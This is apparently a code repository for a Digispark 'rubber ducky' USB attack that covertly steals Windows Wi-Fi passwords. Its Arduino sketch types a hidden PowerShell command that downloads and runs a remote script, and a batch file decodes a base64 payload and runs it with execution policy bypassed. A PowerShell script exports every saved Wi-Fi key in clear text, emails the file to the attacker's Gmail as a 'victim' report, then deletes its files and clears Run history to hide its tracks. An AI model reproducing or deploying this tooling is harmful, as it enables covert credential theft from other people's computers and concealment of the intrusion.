├── README.md ├── temp.PS1 ├── wifi.PS1 ├── wifi.bat └── wifi.ino /README.md: -------------------------------------------------------------------------------- 1 | # wifi-password-extractor 2 | A Digispark rubber ducky script for Windows to Extract and Mail Wifi profiles (SSID, password) in plain text format. 3 | -------------------------------------------------------------------------------- /temp.PS1: -------------------------------------------------------------------------------- 1 | netsh wlan export profile key=clear 2 | 3 | echo "Wifi Password Extractor Coded By Exploitech" > wifipass.txt 4 | dir *.xml |% { 5 | $xml=[xml] (get-content $_) 6 | $a= "========================================`r`n SSID = "+$xml.WLANProfile.SSIDConfig.SSID.name + "`r`n PASS = " +$xml.WLANProfile.MSM.Security.sharedKey.keymaterial 7 | 8 | Out-File wifipass.txt -Append -InputObject $a 9 | 10 | } 11 | 12 | 13 | $SMTPServer = 'smtp.gmail.com' 14 | 15 | 16 | $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 17 | 18 | 19 | $SMTPInfo.EnableSsl = $true 20 | 21 | 22 | $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('yourusername@gmail.com', 'password') 23 | 24 | 25 | $ReportEmail = New-Object System.Net.Mail.MailMessage 26 | 27 | 28 | $ReportEmail.From = 'yourusername@gmail.com' 29 | 30 | 31 | $ReportEmail.To.Add('yourusername@gmail.com') 32 | 33 | 34 | $ReportEmail.Subject = 'WIFI Pass Report of ' + $env:UserName 35 | 36 | 37 | $ReportEmail.Body = 'Attached is your victim WIFI Passwords' 38 | 39 | 40 | $ReportEmail.Attachments.Add('wifipass.txt') 41 | 42 | 43 | $SMTPInfo.Send($ReportEmail) 44 | 45 | rm *.xml -Force 46 | rm w.txt -Force 47 | rm w.PS1 -Force 48 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 49 | -------------------------------------------------------------------------------- /wifi.PS1: -------------------------------------------------------------------------------- 1 | cd /;mkdir x64;cd x64; 2 | wget PASTE-YOUR-LINK-HERE -OutFile wifi.bat 3 | start wifi.bat 4 | 5 | // --> Clearing your tracks 6 | 7 | 8 | Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue 9 | 10 | exit 11 | -------------------------------------------------------------------------------- /wifi.bat: -------------------------------------------------------------------------------- 1 | echo ENCODED-BASE64-CODE > w.txt 2 | certutil -decode w.txt w.PS1 3 | powershell -windowstyle hidden -ExecutionPolicy ByPass -File w.PS1 -------------------------------------------------------------------------------- /wifi.ino: -------------------------------------------------------------------------------- 1 | //A Digispark rubber ducky script for Windows to Extract and Mail Wifi profiles (SSID, password) in plain text format. 2 | 3 | #include "DigiKeyboard.h" 4 | 5 | void setup() 6 | 7 | 8 | { 9 | 10 | pinMode(1, OUTPUT); 11 | 12 | //-->Initial Delay 13 | DigiKeyboard.delay(2000); 14 | 15 | // --> Obfuscate the command prompt 16 | DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT); 17 | DigiKeyboard.delay(300); 18 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 19 | DigiKeyboard.delay(300); 20 | 21 | DigiKeyboard.print(F("powershell -windowstyle hidden \"IEX (New-Object Net.WebClient).DownloadString('YOUR-DOWNLOAD-LINK-WIFI.PS1');\"")); 22 | DigiKeyboard.delay(100); 23 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 24 | 25 | 26 | } 27 | 28 | void loop() { 29 | 30 | 31 | digitalWrite(1, HIGH); 32 | delay(1000); // wait for a second 33 | digitalWrite(1, LOW); 34 | delay(1000); 35 | } 36 | 37 | 38 | --------------------------------------------------------------------------------